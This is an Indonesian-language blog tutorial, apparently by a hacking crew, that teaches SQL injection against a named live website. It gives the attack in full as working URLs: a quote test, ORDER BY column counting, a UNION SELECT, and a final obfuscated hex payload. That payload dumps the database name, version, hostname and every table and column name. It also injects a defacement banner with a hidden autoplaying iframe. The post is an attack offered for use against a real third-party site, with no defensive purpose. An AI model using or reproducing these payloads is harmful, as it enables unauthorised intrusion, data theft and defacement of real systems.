TUTORIAL SQL PARAMETER HTML

 Assalamualaikum




Gua Noub93 Gans:v Kali ini akan mengtutor Sql Parameter Html


Bahan"

->Dios

->Kuota -_


Live Target : https://kramatdjati-garuda.com/statis-1-profil.html

Langsng aja tempel di crome atau google


Nah itu tampilan semula,belom di apa"in:v

Oke lanjut kita cek vuln atau tidak dengan cara Tambahin ' sesudah angka 1 

Maka tampilan akan menjadi seperti ini


Nah itu tandanya Vuln Sql 

Oke lanjut ke order by nya

Contoh :

https://kramatdjati-garuda.com/statis-1'+order+by+1--+--profil.html

Nah seperti itu,maka tampilan akan menjadi seperti ini


Nah kembali kesemula lagi...

Lalu kalian naikin aja angka nya sampe nemu yg error

order+by+1--+-

order+by+2--+-

order+by+3--+-

Prcepat ae.....

Disini gua nemu error nya di angka 8

Contoh : https://kramatdjati-garuda.com/statis-1'+order+by+8--+--profil.html

Nah maka tampilan akan menjadi seperti ini


Nah sekarang lanjut ke union select nya

Nah kan tadi error nya di angka 8,jadi sudah pasti angka ajaib/togel di angka 7 

Cara untuk nemuin nya begini 

Contoh : https://kramatdjati-garuda.com/statis--1'+union+select+1,2,3,4,5,6,7--+--profil.html

Jangan lupa kasi - sebelum angka 1 ye.....

Oke lanjut maka tampilan akan menjadi seperti ini


Nah angka togel nya muncul,tinggal tempel aja dioa di no togelnya


Contoh :

https://kramatdjati-garuda.com/statis--1'+AND+1=0+UNION+SELECT+1,CoNcAt/**/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f672e746f7034746f702e696f2f705f313838373771636868322e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e272c274e6f756239332047616e73272c273c2f666f6e743e272c273c2f62723e3c696672616d652077696474683d22302522206865696768743d223022207363726f6c6c696e673d226e6f22206672616d65626f726465723d226e6f22206c6f6f703d22747275652220616c6c6f773d226175746f706c617922207372633d2268747470733a2f2f612e746f7034746f702e696f2f6d5f31383933777971796b302e6d7033223e3c2f696672616d653e,database(),version(),sysdate(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,@@Hostname,5,6,7--+--profil.html


Maka hasil nya :


Gua Noub93,Sekian Terimakasih:v

Wassalamu'alaikum


Thankto : Dark_193N,Akhsan,Killermoon,Badboy


#Nexus Cyber Team

Tidak ada komentar:

Posting Komentar